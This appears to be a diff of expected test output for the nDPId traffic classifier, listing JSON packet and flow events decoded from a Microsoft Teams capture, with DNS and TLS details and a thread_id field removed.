00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00193{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041673611} 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041673611}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00193{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":6,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041674611} 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":6,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041674611}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587041675216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041675216,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZv6wAAAQEICjCEkvgtAPMf"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587041675216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041675216,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZv6wAAAQEICjCEkvgtAPMf"}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":8,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041675409} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":8,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041675409}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00193{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":9,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041675611} 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":9,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041675611}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1587041675997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041675997,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPKfkAAP8RDk3AqAEGwKgBAe2NADUAO4czzp0BAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQAB"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1587041675997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041675997,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPKfkAAP8RDk3AqAEGwKgBAe2NADUAO4czzp0BAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQAB"}
00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -35,8 +35,8 @@
01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
00359{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041676592,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041676592,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041676611} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041676611}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="}
@@ -55,19 +55,19 @@
00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"}
